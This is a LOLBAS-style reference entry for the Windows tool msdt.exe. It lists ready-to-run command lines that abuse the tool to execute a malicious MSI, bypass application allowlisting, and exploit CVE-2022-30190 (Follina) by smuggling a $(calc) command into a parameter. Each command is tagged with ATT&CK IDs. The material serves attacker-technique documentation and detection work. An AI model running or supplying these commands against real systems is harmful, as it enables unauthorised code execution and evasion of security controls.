.. /Msdt.exe
Star

Execute (GUI)
AWL bypass (GUI)

Microsoft diagnostics tool


Paths:

Resources:
Acknowledgements:

Detection:

Execute

  1. Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.

    msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
    Use case
    Execute code
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218
    Tags
    Application: GUI
    This LOLBAS will cause a graphical user interface (GUI) to be displayed.

AWL bypass

  1. Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.

    msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
    Use case
    Execute code bypass Application whitelisting
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1218
    Tags
    Application: GUI
    This LOLBAS will cause a graphical user interface (GUI) to be displayed.

  2. Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.

    msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
    Use case
    Execute code bypass Application allowlisting
    Privileges required
    User
    Operating systems
    Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique
    T1202
    Tags
    Application: GUI
    This LOLBAS will cause a graphical user interface (GUI) to be displayed.